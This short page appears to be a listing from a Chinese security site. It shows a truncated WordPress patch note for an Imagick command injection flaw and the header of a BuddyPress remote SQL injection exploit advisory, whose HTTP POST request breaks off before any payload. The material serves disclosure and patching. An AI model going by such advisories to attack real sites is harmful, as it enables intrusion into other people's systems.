wordpress WPImageEditorImagick 指令注入漏洞修复
-
在/wp-includes/media.php的_wp_image_editor_choose函数内部找到:
$implementations = apply_filters( 'wp_image_editors', array( 'WP_Image_Editor_Imagi...
作者: Ivan Terkin
类型: Remote Exploit
漏洞: Remote SQL Injection
软件下载地址: buddypress.org
影响版本: 1.5.5及以下
测试平台: Buddypress 1.5.4
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: www.xxxx.com
…